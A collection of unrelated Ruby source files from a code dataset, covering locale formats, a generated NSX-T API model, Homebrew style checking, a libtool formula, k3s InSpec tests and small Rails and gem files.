@dateformats[:buddhist]["full"] = "EEEE, MMMM d, yyyy G"
@dateformats[:buddhist]["long"] = "MMMM d, yyyy G"
@dateformats[:buddhist]["medium"] = "MMM d, yyyy G"
@dateformats[:buddhist]["short"] = "M/d/yyyy"
@dateformats[:chinese] = {}
@dateformats[:chinese]["full"] = "EEEE y'x'G-Ml-d"
@dateformats[:chinese]["long"] = "y'x'G-Ml-d"
@dateformats[:chinese]["medium"] = "y'x'G-Ml-d"
@dateformats[:chinese]["short"] = "y'x'G-Ml-d"
@dateformats[:gregorian] = {}
@dateformats[:gregorian]["full"] = "EEEE dd MMMM yyyy"
@dateformats[:gregorian]["long"] = "d. MMM yyyy"
@dateformats[:gregorian]["medium"] = "dd-MM-yyyy"
@dateformats[:gregorian]["short"] = "dd-MM-yy"
@dateformats[:japanese] = {}
@dateformats[:japanese]["full"] = "EEEE, MMMM d, y G"
@dateformats[:japanese]["long"] = "MMMM d, y G"
@dateformats[:japanese]["medium"] = "MMM d, y G"
@dateformats[:japanese]["short"] = "M/d/yy"
@dateformat_defaults = {}
@dateformat_defaults["buddhist"] = "medium"
@dateformat_defaults["chinese"] = "medium"
@dateformat_defaults["gregorian"] = "medium"
@dateformat_defaults["japanese"] = "medium"
@timeformats = {}
@timeformats[:buddhist] = {}
@timeformats[:buddhist]["full"] = "h:mm:ss a z"
@timeformats[:buddhist]["long"] = "h:mm:ss a z"
@timeformats[:buddhist]["medium"] = "h:mm:ss a"
@timeformats[:buddhist]["short"] = "h:mm a"
@timeformats[:chinese] = {}
@timeformats[:chinese]["full"] = "h:mm:ss a z"
@timeformats[:chinese]["long"] = "h:mm:ss a z"
@timeformats[:chinese]["medium"] = "h:mm:ss a"
@timeformats[:chinese]["short"] = "h:mm a"
@timeformats[:gregorian] = {}
@timeformats[:gregorian]["full"] = "HH:mm:ss z"
@timeformats[:gregorian]["long"] = "HH:mm:ss z"
@timeformats[:gregorian]["medium"] = "HH:mm:ss"
@timeformats[:gregorian]["short"] = "HH:mm"
@timeformats[:japanese] = {}
@timeformats[:japanese]["full"] = "h:mm:ss a z"
@timeformats[:japanese]["long"] = "h:mm:ss a z"
@timeformats[:japanese]["medium"] = "h:mm:ss a"
@timeformats[:japanese]["short"] = "h:mm a"
@timeformat_defaults = {}
@timeformat_defaults["buddhist"] = "medium"
@timeformat_defaults["chinese"] = "medium"
@timeformat_defaults["gregorian"] = "medium"
@timeformat_defaults["japanese"] = "medium"
@datetimeformats = {}
@datetimeformats["buddhist"] = "{1} {0}"
@datetimeformats["chinese"] = "{1} {0}"
@datetimeformats["gregorian"] = "{1} {0}"
@datetimeformats["japanese"] = "{1} {0}"
@fields = {}
@fields[:gregorian] = {}
@fields[:gregorian]["day"] = "Day"
@fields[:gregorian]["dayperiod"] = "Dayperiod"
@fields[:gregorian]["era"] = "Era"
@fields[:gregorian]["hour"] = "Hour"
@fields[:gregorian]["minute"] = "Minute"
@fields[:gregorian]["month"] = "Month"
@fields[:gregorian]["second"] = "Second"
@fields[:gregorian]["week"] = "Week"
@fields[:gregorian]["weekday"] = "Day of the Week"
@fields[:gregorian]["year"] = "Year"
@fields[:gregorian]["zone"] = "Zone"
@field_relatives = {}
end
public
attr_reader :localized_pattern_characters
attr_reader :default
attr_reader :months
attr_reader :monthformat_defaults
attr_reader :days
attr_reader :dayformat_defaults
attr_reader :week_firstdays
attr_reader :weekend_starts
attr_reader :weekend_ends
attr_reader :mindays
attr_reader :am
attr_reader :pm
attr_reader :era_names
attr_reader :era_abbrs
attr_reader :dateformats
attr_reader :dateformat_defaults
attr_reader :timeformats
attr_reader :timeformat_defaults
attr_reader :datetimeformats
attr_reader :fields
attr_reader :field_relatives
| 42.507092 | 67 | 0.58626 |
e9611eb347ddcf808ff0333b4659899ab8fe4510 | 6,119 | =begin
#NSX-T Data Center Policy API
#VMware NSX-T Data Center Policy REST API
OpenAPI spec version: 3.1.0.0.0
Generated by: https://github.com/swagger-api/swagger-codegen.git
Swagger Codegen version: 2.4.19
=end
require 'date'
module NSXTPolicy
# Query statistics counters to an upstream server including successfully forwarded queries and failed queries.
class NsxTUpstreamServerStatistics
# Queries failed to forward.
attr_accessor :queries_failed
# Upstream server ip
attr_accessor :upstream_server
# Queries forwarded successfully
attr_accessor :queries_succeeded
# Attribute mapping from ruby-style variable name to JSON key.
def self.attribute_map
{
:'queries_failed' => :'queries_failed',
:'upstream_server' => :'upstream_server',
:'queries_succeeded' => :'queries_succeeded'
}
end
# Attribute type mapping.
def self.swagger_types
{
:'queries_failed' => :'Integer',
:'upstream_server' => :'String',
:'queries_succeeded' => :'Integer'
}
end
# Initializes the object
# @param [Hash] attributes Model attributes in the form of hash
def initialize(attributes = {})
return unless attributes.is_a?(Hash)
# convert string to symbol for hash key
attributes = attributes.each_with_object({}) { |(k, v), h| h[k.to_sym] = v }
if attributes.has_key?(:'queries_failed')
self.queries_failed = attributes[:'queries_failed']
end
if attributes.has_key?(:'upstream_server')
self.upstream_server = attributes[:'upstream_server']
end
if attributes.has_key?(:'queries_succeeded')
self.queries_succeeded = attributes[:'queries_succeeded']
end
end
# Show invalid properties with the reasons. Usually used together with valid?
# @return Array for valid properties with the reasons
def list_invalid_properties
invalid_properties = Array.new
invalid_properties
end
# Check to see if the all the properties in the model are valid
# @return true if the model is valid
def valid?
true
end
# Checks equality by comparing each attribute.
# @param [Object] Object to be compared
def ==(o)
return true if self.equal?(o)
self.class == o.class &&
queries_failed == o.queries_failed &&
upstream_server == o.upstream_server &&
queries_succeeded == o.queries_succeeded
end
# @see the `==` method
# @param [Object] Object to be compared
def eql?(o)
self == o
end
# Calculates hash code according to all attributes.
# @return [Fixnum] Hash code
def hash
[queries_failed, upstream_server, queries_succeeded].hash
end
# Builds the object from hash
# @param [Hash] attributes Model attributes in the form of hash
# @return [Object] Returns the model itself
def build_from_hash(attributes)
return nil unless attributes.is_a?(Hash)
self.class.swagger_types.each_pair do |key, type|
if type =~ /\AArray<(.*)>/i
# check to ensure the input is an array given that the attribute
# is documented as an array but the input is not
if attributes[self.class.attribute_map[key]].is_a?(Array)
self.send("#{key}=", attributes[self.class.attribute_map[key]].map { |v| _deserialize($1, v) })
end
elsif !attributes[self.class.attribute_map[key]].nil?
self.send("#{key}=", _deserialize(type, attributes[self.class.attribute_map[key]]))
end # or else data not found in attributes(hash), not an issue as the data can be optional
end
self
end
# Deserializes the data based on type
# @param string type Data type
# @param string value Value to be deserialized
# @return [Object] Deserialized data
def _deserialize(type, value)
case type.to_sym
when :DateTime
DateTime.parse(value)
when :Date
Date.parse(value)
when :String
value.to_s
when :Integer
value.to_i
when :Float
value.to_f
when :BOOLEAN
if value.to_s =~ /\A(true|t|yes|y|1)\z/i
true
else
false
end
when :Object
# generic object (usually a Hash), return directly
value
when /\AArray<(?<inner_type>.+)>\z/
inner_type = Regexp.last_match[:inner_type]
value.map { |v| _deserialize(inner_type, v) }
when /\AHash<(?<k_type>.+?), (?<v_type>.+)>\z/
k_type = Regexp.last_match[:k_type]
v_type = Regexp.last_match[:v_type]
{}.tap do |hash|
value.each do |k, v|
hash[_deserialize(k_type, k)] = _deserialize(v_type, v)
end
end
else # model
temp_model = NSXTPolicy.const_get(type).new
temp_model.build_from_hash(value)
end
end
# Returns the string representation of the object
# @return [String] String presentation of the object
def to_s
to_hash.to_s
end
# to_body is an alias to to_hash (backward compatibility)
# @return [Hash] Returns the object in the form of hash
def to_body
to_hash
end
# Returns the object in the form of hash
# @return [Hash] Returns the object in the form of hash
def to_hash
hash = {}
self.class.attribute_map.each_pair do |attr, param|
value = self.send(attr)
next if value.nil?
hash[param] = _to_hash(value)
end
hash
end
# Outputs non-array value in the form of hash
# For object, use to_hash. Otherwise, just return the value
# @param [Object] value Any valid value
# @return [Hash] Returns the value in the form of hash
def _to_hash(value)
if value.is_a?(Array)
value.compact.map { |v| _to_hash(v) }
elsif value.is_a?(Hash)
{}.tap do |hash|
value.each { |k, v| hash[k] = _to_hash(v) }
end
elsif value.respond_to? :to_hash
value.to_hash
else
value
end
end
end
end
| 29.560386 | 113 | 0.631149 |
bf5bd2e0f4d2bf4f22c98888123bf5adaab4c920 | 1,392 | # frozen_string_literal: true
# Provide service methods for getting a list of all authorities and scenarios for an authority.
module QaServer
class AuthorityListerService
# Return a list of supported authorities
# @return [Array<String>] list of authorities
def self.authorities_list
Qa::LinkedData::AuthorityService.authority_names
end
# Fill in status_log with data about each scenario for an authority
# @param authority_name [String] the name of the authority
# @param status_log [ScenarioLogger] the log that will hold the data about the scenarios
def self.scenarios_list(authority_name:, status_log:)
scenarios = QaServer::ScenariosLoaderService.load(authority_name: authority_name, status_log: status_log)
return if scenarios.blank?
list_terms(scenarios, status_log)
list_searches(scenarios, status_log)
end
def self.list_terms(scenarios, status_log)
scenarios.term_scenarios.each { |scenario| QaServer::TermScenarioValidator.new(scenario: scenario, status_log: status_log).log_without_running }
end
private_class_method :list_terms
def self.list_searches(scenarios, status_log)
scenarios.search_scenarios.each { |scenario| QaServer::SearchScenarioValidator.new(scenario: scenario, status_log: status_log).log_without_running }
end
private_class_method :list_searches
end
end
| 43.5 | 154 | 0.770115 |
ac62c856759e6f7b50a03432bf2c3064c3a243d9 | 70 | # add custom rake tasks here
desc 'test it'
task :foo do
puts 1
end
| 11.666667 | 28 | 0.7 |
61039e30aa13acf27fc6de6d3e8e08cd76ff66cb | 730 | module FE
class Document
class Regulation < Element
include ActiveModel::Validations
attr_accessor :number, :date
validates :number, presence: true
validates :date, presence: true
def initialize(args={})
@number = args[:number] ||= "DGT-R-48-2016"
@date = args[:date] ||= "20-02-2017 13:22:22"
end
def build_xml(node, document)
raise FE::Error.new("regulation invalid",class: self.class, messages: errors.messages) unless valid?
node = Nokogiri::XML::Builder.new if node.nil?
node.Normativa do |xml|
xml.NumeroResolucion @number
xml.FechaResolucion @date
end
end
end
end
end | 28.076923 | 108 | 0.59726 |
e8121414cae83d27692d479286b703cbea35acb0 | 382 | class CreateApiUsersSupportAppPermission < ActiveRecord::Migration
class SupportedPermission < ApplicationRecord
belongs_to :application, class_name: "Doorkeeper::Application"
end
def up
support = ::Doorkeeper::Application.find_by(name: "Support")
if support
SupportedPermission.create!(application: support, name: "api_users") if support
end
end
end
| 29.384615 | 85 | 0.759162 |
1a6591f59458ed2df453eb49fdd29e8777237378 | 145 | class AddOtherOrganisationToUsers < ActiveRecord::Migration[4.2]
def change
add_column :users, :other_organisation, :string
end
end
| 24.166667 | 65 | 0.751724 |
e2bdf39926caba0379169520036555288ec562a5 | 4,934 | =begin
#Accounting API
#No description provided (generated by Openapi Generator https://github.com/openapitools/openapi-generator)
The version of the OpenAPI document: 2.1.3
Contact: [email protected]
Generated by: https://openapi-generator.tech
OpenAPI Generator version: 4.3.0
=end
require 'spec_helper'
require 'json'
require 'date'
# Unit tests for XeroRuby::Accounting::Quote
# Automatically generated by openapi-generator (https://openapi-generator.tech)
# Please update as you see appropriate
describe 'Quote' do
before do
# run before each test
@instance = XeroRuby::Accounting::Quote.new
end
after do
# run after each test
end
describe 'test an instance of Quote' do
it 'should create an instance of Quote' do
expect(@instance).to be_instance_of(XeroRuby::Accounting::Quote)
end
end
describe 'test attribute "quote_id"' do
it 'should work' do
# assertion here. ref: https://www.relishapp.com/rspec/rspec-expectations/docs/built-in-matchers
end
end
describe 'test attribute "quote_number"' do
it 'should work' do
# assertion here. ref: https://www.relishapp.com/rspec/rspec-expectations/docs/built-in-matchers
end
end
describe 'test attribute "reference"' do
it 'should work' do
# assertion here. ref: https://www.relishapp.com/rspec/rspec-expectations/docs/built-in-matchers
end
end
describe 'test attribute "terms"' do
it 'should work' do
# assertion here. ref: https://www.relishapp.com/rspec/rspec-expectations/docs/built-in-matchers
end
end
describe 'test attribute "contact"' do
it 'should work' do
# assertion here. ref: https://www.relishapp.com/rspec/rspec-expectations/docs/built-in-matchers
end
end
describe 'test attribute "line_items"' do
it 'should work' do
# assertion here. ref: https://www.relishapp.com/rspec/rspec-expectations/docs/built-in-matchers
end
end
describe 'test attribute "date"' do
it 'should work' do
# assertion here. ref: https://www.relishapp.com/rspec/rspec-expectations/docs/built-in-matchers
end
end
describe 'test attribute "date_string"' do
it 'should work' do
# assertion here. ref: https://www.relishapp.com/rspec/rspec-expectations/docs/built-in-matchers
end
end
describe 'test attribute "expiry_date"' do
it 'should work' do
# assertion here. ref: https://www.relishapp.com/rspec/rspec-expectations/docs/built-in-matchers
end
end
describe 'test attribute "expiry_date_string"' do
it 'should work' do
# assertion here. ref: https://www.relishapp.com/rspec/rspec-expectations/docs/built-in-matchers
end
end
describe 'test attribute "status"' do
it 'should work' do
# assertion here. ref: https://www.relishapp.com/rspec/rspec-expectations/docs/built-in-matchers
end
end
describe 'test attribute "currency_code"' do
it 'should work' do
# assertion here. ref: https://www.relishapp.com/rspec/rspec-expectations/docs/built-in-matchers
end
end
describe 'test attribute "currency_rate"' do
it 'should work' do
# assertion here. ref: https://www.relishapp.com/rspec/rspec-expectations/docs/built-in-matchers
end
end
describe 'test attribute "sub_total"' do
it 'should work' do
# assertion here. ref: https://www.relishapp.com/rspec/rspec-expectations/docs/built-in-matchers
end
end
describe 'test attribute "total_tax"' do
it 'should work' do
# assertion here. ref: https://www.relishapp.com/rspec/rspec-expectations/docs/built-in-matchers
end
end
describe 'test attribute "total"' do
it 'should work' do
# assertion here. ref: https://www.relishapp.com/rspec/rspec-expectations/docs/built-in-matchers
end
end
describe 'test attribute "total_discount"' do
it 'should work' do
# assertion here. ref: https://www.relishapp.com/rspec/rspec-expectations/docs/built-in-matchers
end
end
describe 'test attribute "title"' do
it 'should work' do
# assertion here. ref: https://www.relishapp.com/rspec/rspec-expectations/docs/built-in-matchers
end
end
describe 'test attribute "summary"' do
it 'should work' do
# assertion here. ref: https://www.relishapp.com/rspec/rspec-expectations/docs/built-in-matchers
end
end
describe 'test attribute "branding_theme_id"' do
it 'should work' do
# assertion here. ref: https://www.relishapp.com/rspec/rspec-expectations/docs/built-in-matchers
end
end
describe 'test attribute "updated_date_utc"' do
it 'should work' do
# assertion here. ref: https://www.relishapp.com/rspec/rspec-expectations/docs/built-in-matchers
end
end
describe 'test attribute "line_amount_types"' do
it 'should work' do
# assertion here. ref: https://www.relishapp.com/rspec/rspec-expectations/docs/built-in-matchers
end
end
end
| 29.369048 | 107 | 0.707134 |
91bc2afaad5d52bb506d5923a6cc5bd6c968aec0 | 941 | require "rails_helper"
RSpec.describe ContactPreferenceController do
let(:step) { assigns(:step) }
let(:invalid_params) { { step: { blah: "" } } }
let(:step_class) { ContactPreference }
before { session[:snap_application_id] = current_app.id }
include_examples "step controller", "param validation"
describe "#edit" do
it "assigns the fields to the step" do
get :edit
expect(step.sms_consented).to eq false
end
end
describe "#update" do
context "when valid" do
it "updates the current app and redirects to the next step" do
valid_params = { sms_consented: "true" }
put :update, params: { step: valid_params }
expect(current_app.reload.sms_consented).to eq true
expect(response).to redirect_to("/steps/contact-confirm-phone-number")
end
end
end
def current_app
@_current_app ||= create(:snap_application, sms_consented: false)
end
end
| 25.432432 | 78 | 0.676939 |
916d3bc64f1e7455542a89f2ac3ef0bd49b802b0 | 9,141 | # typed: false
# frozen_string_literal: true
require "shellwords"
module Homebrew
# Helper module for running RuboCop.
#
# @api private
module Style
module_function
# Checks style for a list of files, printing simple RuboCop output.
# Returns true if violations were found, false otherwise.
def check_style_and_print(files, **options)
success = check_style_impl(files, :print, **options)
if ENV["GITHUB_ACTIONS"] && !success
check_style_json(files, **options).each do |path, offenses|
offenses.each do |o|
line = o.location.line
column = o.location.line
annotation = GitHub::Actions::Annotation.new(:error, o.message, file: path, line: line, column: column)
puts annotation if annotation.relevant?
end
end
end
success
end
# Checks style for a list of files, returning results as an {Offenses}
# object parsed from its JSON output.
def check_style_json(files, **options)
check_style_impl(files, :json, **options)
end
def check_style_impl(files, output_type,
fix: false,
except_cops: nil, only_cops: nil,
display_cop_names: false,
reset_cache: false,
debug: false, verbose: false)
raise ArgumentError, "Invalid output type: #{output_type.inspect}" unless [:print, :json].include?(output_type)
shell_files, ruby_files =
Array(files).map(&method(:Pathname))
.partition { |f| f.realpath == HOMEBREW_BREW_FILE.realpath || f.extname == ".sh" }
rubocop_result = if shell_files.any? && ruby_files.none?
output_type == :json ? [] : true
else
run_rubocop(ruby_files, output_type,
fix: fix,
except_cops: except_cops, only_cops: only_cops,
display_cop_names: display_cop_names,
reset_cache: reset_cache,
debug: debug, verbose: verbose)
end
shellcheck_result = if ruby_files.any? && shell_files.none?
output_type == :json ? [] : true
else
run_shellcheck(shell_files, output_type)
end
if output_type == :json
Offenses.new(rubocop_result + shellcheck_result)
else
rubocop_result && shellcheck_result
end
end
def run_rubocop(files, output_type,
fix: false, except_cops: nil, only_cops: nil, display_cop_names: false, reset_cache: false,
debug: false, verbose: false)
Homebrew.install_bundler_gems!
require "rubocop"
require "rubocops"
args = %w[
--force-exclusion
]
args << if fix
"-A"
else
"--parallel"
end
args += ["--extra-details"] if verbose
args += ["--display-cop-names"] if display_cop_names || verbose
if except_cops
except_cops.map! { |cop| RuboCop::Cop::Cop.registry.qualified_cop_name(cop.to_s, "") }
cops_to_exclude = except_cops.select do |cop|
RuboCop::Cop::Cop.registry.names.include?(cop) ||
RuboCop::Cop::Cop.registry.departments.include?(cop.to_sym)
end
args << "--except" << cops_to_exclude.join(",") unless cops_to_exclude.empty?
elsif only_cops
only_cops.map! { |cop| RuboCop::Cop::Cop.registry.qualified_cop_name(cop.to_s, "") }
cops_to_include = only_cops.select do |cop|
RuboCop::Cop::Cop.registry.names.include?(cop) ||
RuboCop::Cop::Cop.registry.departments.include?(cop.to_sym)
end
odie "RuboCops #{only_cops.join(",")} were not found" if cops_to_include.empty?
args << "--only" << cops_to_include.join(",")
end
has_non_formula = files.any? do |file|
File.expand_path(file).start_with? HOMEBREW_LIBRARY_PATH
end
if files.any? && !has_non_formula
config = if files.first && File.exist?("#{files.first}/spec")
HOMEBREW_LIBRARY/".rubocop_rspec.yml"
else
HOMEBREW_LIBRARY/".rubocop.yml"
end
args << "--config" << config
end
if files.blank?
args << HOMEBREW_LIBRARY_PATH
else
args += files
end
cache_env = { "XDG_CACHE_HOME" => "#{HOMEBREW_CACHE}/style" }
FileUtils.rm_rf cache_env["XDG_CACHE_HOME"] if reset_cache
ruby_args = [
(ENV["HOMEBREW_RUBY_WARNINGS"] if !debug && !verbose),
"-S",
"rubocop",
].compact.freeze
case output_type
when :print
args << "--debug" if debug
# Don't show the default formatter's progress dots
# on CI or if only checking a single file.
args << "--format" << "clang" if ENV["CI"] || files.count { |f| !f.directory? } == 1
args << "--color" if Tty.color?
system cache_env, RUBY_PATH, *ruby_args, *args
$CHILD_STATUS.success?
when :json
result = system_command RUBY_PATH,
args: [*ruby_args, "--format", "json", *args],
env: cache_env
json = json_result!(result)
json["files"]
end
end
def run_shellcheck(files, output_type)
shellcheck = Formula["shellcheck"].opt_bin/"shellcheck" if Formula["shellcheck"].any_version_installed?
shellcheck ||= which("shellcheck")
shellcheck ||= which("shellcheck", ENV["HOMEBREW_PATH"])
shellcheck ||= begin
ohai "Installing `shellcheck` for shell style checks..."
safe_system HOMEBREW_BREW_FILE, "install", "shellcheck"
Formula["shellcheck"].opt_bin/"shellcheck"
end
if files.empty?
files = [
HOMEBREW_BREW_FILE,
# TODO: HOMEBREW_REPOSITORY/"completions/bash/brew",
*Pathname.glob("#{HOMEBREW_LIBRARY}/Homebrew/*.sh"),
*Pathname.glob("#{HOMEBREW_LIBRARY}/Homebrew/cmd/*.sh"),
*Pathname.glob("#{HOMEBREW_LIBRARY}/Homebrew/utils/*.sh"),
]
end
args = ["--shell=bash", "--", *files] # TODO: Add `--enable=all` to check for more problems.
case output_type
when :print
system shellcheck, "--format=tty", *args
$CHILD_STATUS.success?
when :json
result = system_command shellcheck, args: ["--format=json", *args]
json = json_result!(result)
# Convert to same format as RuboCop offenses.
severity_hash = { "style" => "refactor", "info" => "convention" }
json.group_by { |v| v["file"] }
.map do |k, v|
{
"path" => k,
"offenses" => v.map do |o|
o.delete("file")
o["cop_name"] = "SC#{o.delete("code")}"
level = o.delete("level")
o["severity"] = severity_hash.fetch(level, level)
line = o.delete("line")
column = o.delete("column")
o["corrected"] = false
o["correctable"] = o.delete("fix").present?
o["location"] = {
"start_line" => line,
"start_column" => column,
"last_line" => o.delete("endLine"),
"last_column" => o.delete("endColumn"),
"line" => line,
"column" => column,
}
o
end,
}
end
end
end
def json_result!(result)
# An exit status of 1 just means violations were found; other numbers mean
# execution errors.
# JSON needs to be at least 2 characters.
result.assert_success! if !(0..1).cover?(result.status.exitstatus) || result.stdout.length < 2
JSON.parse(result.stdout)
end
# Collection of style offenses.
class Offenses
include Enumerable
def initialize(paths)
@offenses = {}
paths.each do |f|
next if f["offenses"].empty?
path = Pathname(f["path"]).realpath
@offenses[path] = f["offenses"].map { |x| Offense.new(x) }
end
end
def for_path(path)
@offenses.fetch(Pathname(path), [])
end
def each(*args, &block)
@offenses.each(*args, &block)
end
end
# A style offense.
class Offense
attr_reader :severity, :message, :corrected, :location, :cop_name
def initialize(json)
@severity = json["severity"]
@message = json["message"]
@cop_name = json["cop_name"]
@corrected = json["corrected"]
@location = LineLocation.new(json["location"])
end
def severity_code
@severity[0].upcase
end
def corrected?
@corrected
end
end
# Source location of a style offense.
class LineLocation
extend T::Sig
attr_reader :line, :column
def initialize(json)
@line = json["line"]
@column = json["column"]
end
sig { returns(String) }
def to_s
"#{line}: col #{column}"
end
end
end
end
| 30.368771 | 117 | 0.564271 |
7ab6a9ab2e631c0ac57b4e8dfc6e932eb84ef787 | 2,644 | class Libtool < Formula
desc "Generic library support script"
homepage "https://www.gnu.org/software/libtool/"
url "https://ftp.gnu.org/gnu/libtool/libtool-2.4.6.tar.xz"
mirror "https://ftpmirror.gnu.org/libtool/libtool-2.4.6.tar.xz"
sha256 "7c87a8c2c8c0fc9cd5019e402bed4292462d00a718a7cd5f11218153bf28b26f"
revision OS.mac? ? 2 : 4
bottle do
cellar :any
sha256 "af317b35d0a394b7ef55fba4950735b0392d9f31bececebf9c412261c23a01fc" => :catalina
sha256 "77ca68934e7ed9b9b0b8ce17618d7f08fc5d5a95d7b845622bf57345ffb1c0d6" => :mojave
sha256 "60c7d86f9364e166846f8d3fb2ba969e6ca157e7ecbbb42a1de259116618c2ba" => :high_sierra
sha256 "a0789f8180632aff54aaf7cc276d7c4fe4e7b10f18a949256b87b111c1d8ee26" => :x86_64_linux
end
uses_from_macos "m4" => :build
# Fixes the build on macOS 11:
# https://lists.gnu.org/archive/html/libtool-patches/2020-06/msg00001.html
patch :p0 do
url "https://github.com/Homebrew/formula-patches/raw/e5fbd46a25e35663059296833568667c7b572d9a/libtool/dynamic_lookup-11.patch"
sha256 "5ff495a597a876ce6e371da3e3fe5dd7f78ecb5ebc7be803af81b6f7fcef1079"
end
def install
# Ensure configure is happy with the patched files
%w[aclocal.m4 libltdl/aclocal.m4 Makefile.in libltdl/Makefile.in
config-h.in libltdl/config-h.in configure libltdl/configure].each do |file|
touch file
end
ENV["SED"] = "sed" # prevent libtool from hardcoding sed path from superenv
system "./configure", "--disable-dependency-tracking",
"--prefix=#{prefix}",
("--program-prefix=g" if OS.mac?),
"--enable-ltdl-install"
system "make", "install"
bin.install_symlink "libtool" => "glibtool"
bin.install_symlink "libtoolize" => "glibtoolize"
# Avoid references to the Homebrew shims directory
inreplace bin/"libtool", HOMEBREW_SHIMS_PATH/"linux/super/", "/usr/bin/" unless OS.mac?
end
def caveats
<<~EOS
In order to prevent conflicts with Apple's own libtool we have prepended a "g"
so, you have instead: glibtool and glibtoolize.
EOS
end
test do
system "#{bin}/glibtool", "execute", File.executable?("/usr/bin/true") ? "/usr/bin/true" : "/bin/true"
(testpath/"hello.c").write <<~EOS
#include <stdio.h>
int main() { puts("Hello, world!"); return 0; }
EOS
system bin/"glibtool", "--mode=compile", "--tag=CC",
ENV.cc, "-c", "hello.c", "-o", "hello.o"
system bin/"glibtool", "--mode=link", "--tag=CC",
ENV.cc, "hello.o", "-o", "hello"
assert_match "Hello, world!", shell_output("./hello")
end
end
| 38.882353 | 130 | 0.68646 |
21bf284a856c0559830025981a5cf6c200ac1ecd | 138 | # frozen_string_literal: true
FactoryBot.define do
factory :sub_item do
item
title
sequence(:position) { |n| n }
end
end
| 13.8 | 33 | 0.673913 |
e9cf862bb99ec5daf4b425965a3cf5cf423767aa | 3,636 | # Task file for tests
ref_file = 'tasks/install.yml'
control 'install-01' do
title 'Install Openshift Python module'
impact 'low'
ref ref_file
describe command('pip3 show openshift') do
its('stdout') { should match(/Name: openshift/) }
its('exit_status') { should eq 0 }
end
end
control 'install-02' do
title 'Download K3s binary'
impact 'high'
ref ref_file
describe file('/usr/local/bin/k3s') do
it { should exist }
its('owner') { should eq 'root' }
its('group') { should eq 'root' }
its('mode') { should cmp '0755' }
end
describe command('k3s') do
it { should exist }
end
end
control 'install-03' do
title 'Manage service'
impact 'high'
ref ref_file
describe file('/etc/systemd/system/k3s.service') do
it { should exist }
its('owner') { should eq 'root' }
its('group') { should eq 'root' }
its('mode') { should cmp '0644' }
its('selinux_label') { should eq 'system_u:object_r:systemd_unit_file_t:s0' }
end
end
control 'install-04' do
title 'Manage sysconfig'
impact 'high'
ref ref_file
describe file('/etc/sysconfig/k3s') do
it { should exist }
its('owner') { should eq 'root' }
its('group') { should eq 'root' }
its('mode') { should cmp '0644' }
its('selinux_label') { should eq 'system_u:object_r:etc_t:s0' }
end
end
control 'install-05' do
title 'Ensure k3s is running'
impact 'high'
ref ref_file
describe systemd_service('k3s') do
it { should be_installed }
it { should be_enabled }
it { should be_running }
end
describe port(6443) do
it { should be_listening }
its('protocols') { should include 'tcp' }
its('addresses') { should include '0.0.0.0' }
end
end
control 'install-06' do
title 'Wait for node token to be generated'
impact 'medium'
ref ref_file
describe file('/var/lib/rancher/k3s/server/node-token') do
it { should exist }
end
end
control 'install-07' do
title 'Store k3s certificates'
impact 'medium'
ref ref_file
certificate = '/etc/kubernetes/ca-certificate.pem'
describe file(certificate) do
it { should exist }
its('owner') { should eq 'root' }
its('group') { should eq 'root' }
its('mode') { should cmp '0644' }
end
describe x509_certificate(certificate) do
its('extensions.keyUsage') { should include 'Digital Signature' }
its('extensions.keyUsage') { should include 'Key Encipherment' }
its('extensions.keyUsage') { should include 'Certificate Sign' }
end
end
control 'install-08' do
title 'Ensure k3s certificates are included in system truststore'
impact 'low'
ref ref_file
anchor = '/etc/pki/ca-trust/source/anchors/k3s.crt'
certificate = '/etc/kubernetes/ca-certificate.pem'
describe file(anchor) do
it { should exist }
its('link_path') { should eq certificate }
end
end
control 'install-09' do
title 'K3s is able to communicate with client'
impact 'high'
ref ref_file
# Test connection from CLI client
describe command('/usr/local/bin/k3s kubectl version') do
its('exit_status') { should eq 0 }
its('stdout') { should match 'Server Version' }
end
# Load k3s authentication
config = YAML.safe_load(file('/etc/rancher/k3s/k3s.yaml').content)
credentials = config['users'][0]['user']
describe http('https://localhost:6443/healthz',
method: 'GET',
open_timeout: 60,
read_timeout: 60,
ssl_verify: false,
max_redirects: 3,
auth: {
user: credentials['username'],
pass: credentials['password']
}) do
its('status') { should eq 200 }
its('body') { should eq 'ok' }
end
end
| 26.735294 | 81 | 0.657866 |
267290c9d128aa101dfaf769e159214035ae13a0 | 879 | require 'nokogiri'
module HTMLProofer
module Utils
def pluralize(count, single, plural)
"#{count} " << (count == 1 ? single : plural)
end
def create_nokogiri(path)
if File.exist? path
content = File.open(path).read
else
content = path
end
Nokogiri::HTML(clean_content(content))
end
module_function :create_nokogiri
def swap(href, replacement)
replacement.each do |link, replace|
href = href.gsub(link, replace)
end
href
end
module_function :swap
# address a problem with Nokogiri's parsing URL entities
# problem from http://git.io/vBYU1
# solution from http://git.io/vBYUi
def clean_content(string)
string.gsub(%r{https?://([^>]+)}i) do |url|
url.gsub(/&(?!amp;)/, '&')
end
end
module_function :clean_content
end
end
| 22.538462 | 60 | 0.610922 |
edf3758fecd0cbd3ffbecd1a2f300b00104d4852 | 98 | module Provenance::Governance
def self.table_name_prefix
'provenance_governance_'
end
end
| 16.333333 | 29 | 0.795918 |
acc07a27c1c733eeeb6601af7fc2e0ac237fc9f7 | 1,401 | # Generated by jeweler
# DO NOT EDIT THIS FILE DIRECTLY
# Instead, edit Jeweler::Tasks in Rakefile, and run the gemspec command
# -*- encoding: utf-8 -*-
Gem::Specification.new do |s|
s.name = %q{rubin}
s.version = "0.2.0"
s.required_rubygems_version = Gem::Requirement.new(">= 0") if s.respond_to? :required_rubygems_version=
s.authors = ["Rit Li"]
s.date = %q{2010-10-15}
s.description = %q{Round Robin Generator. Woot!}
s.email = %q{[email protected]}
s.extra_rdoc_files = [
"LICENSE",
"README.rdoc"
]
s.files = [
".document",
".gitignore",
"LICENSE",
"README.rdoc",
"Rakefile",
"VERSION",
"lib/rubin.rb",
"spec/rubin_spec.rb",
"spec/spec_helper.rb"
]
s.homepage = %q{http://github.com/rit/rubin}
s.rdoc_options = ["--charset=UTF-8"]
s.require_paths = ["lib"]
s.rubygems_version = %q{1.3.7}
s.summary = %q{Round Robin Generator}
s.test_files = [
"spec/rubin_spec.rb",
"spec/spec_helper.rb"
]
if s.respond_to? :specification_version then
current_version = Gem::Specification::CURRENT_SPECIFICATION_VERSION
s.specification_version = 3
if Gem::Version.new(Gem::VERSION) >= Gem::Version.new('1.2.0') then
s.add_development_dependency(%q<bacon>, [">= 0"])
else
s.add_dependency(%q<bacon>, [">= 0"])
end
else
s.add_dependency(%q<bacon>, [">= 0"])
end
end
| 25.944444 | 105 | 0.630978 |
bb8f1a7d27081aee076e58458f8228517bdeec5c | 200 | class User < ApplicationRecord
validates :username, presence: true
